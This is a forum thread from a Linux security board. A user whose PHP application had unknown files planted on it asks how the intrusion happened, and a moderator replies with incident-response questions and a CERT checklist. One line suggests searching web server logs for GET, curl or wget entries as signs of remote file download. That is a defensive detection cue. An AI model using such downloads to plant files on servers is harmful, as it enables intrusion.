LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)
-   -   phishing attack on myserver (https://www.linuxquestions.org/questions/linux-security-4/phishing-attack-on-myserver-926138/)

dinakumar12 01-28-2012 05:41 AM
phishing attack on myserver
 
Hi all,

A php application in my server got phishing attack.I found many new files inside that application folder.

I dont know how this hack had been happened.We dont have ftp access for that application.

Can any one please explain me how the hacker would have uploaded these files in to my application.

And how to get rid of this.At present i have stopped my application.

Your suggestions please.

eeekster 01-28-2012 06:23 AM
Quote:
Originally Posted by dinakumar12 (Post 4586624)
Can any one please explain me how the hacker would have uploaded these files in to my application.
I don't think anybody can explain it without more infomation.

dinakumar12 01-28-2012 06:28 AM
Hi,

What are the information i need to provide.I am ready to share.

unSpawn 01-28-2012 07:31 AM
Quote:
Originally Posted by eeekster (Post 4586647)
I don't think anybody can explain it without more infomation.
In this forum members post about problems that may or may not be security issues. These members are often new to Linux and may need more than the average amount of guidance. I ask you to reply not "just because you can" but only if you really want to help. Troubleshooting will be more efficient if you have (and will provide) a rudimentary understanding of Linux security and can anticipate the OPs questions.


Quote:
Originally Posted by dinakumar12 (Post 4586624)
A php application in my server got phishing attack.
Where is the server located (home, work, colocation)? Is it shared or a VPS? Is it yours (root access)?
What is the name of the application?
If it's not homebrewn software, which version exactly?
Was it installed correctly? (No setup files left, proper access permissions)
Was it publicly accessible? (HTTPS vs HTTP, .htaccess or other access restrictions)


Quote:
Originally Posted by dinakumar12 (Post 4586624)
I found many new files inside that application folder.
Which files? (Post list from running '/bin/ls --time-style=long-iso --quoting-style=c -altr /path/to/files;' as root.)
Do any of the web servers logs reference files found or show odd entries (often multiple lines) involving (output of) GET, curl, wget or other wget-like applications?
Do any of the web servers logs show other anomalies around the times the files were placed?


Quote:
Originally Posted by dinakumar12 (Post 4586624)
how to get rid of this. At present i have stopped my application.
If you can not confirm downloading is due to one specific application it would be best to stop the web server for the duration of the investigation.
Please confirm no other problems have arisen before, during and after file placement. If unsure which steps to follow please use this checklist:
Intruder Detection Checklist (CERT): http://web.archive.org/web/200801092...checklist.html
Please post back the results if any.

* Please stay with the thread (subscribe?) until completion and reply as soon as possible when replies are posted.


All times are GMT -5. The time now is 10:39 AM.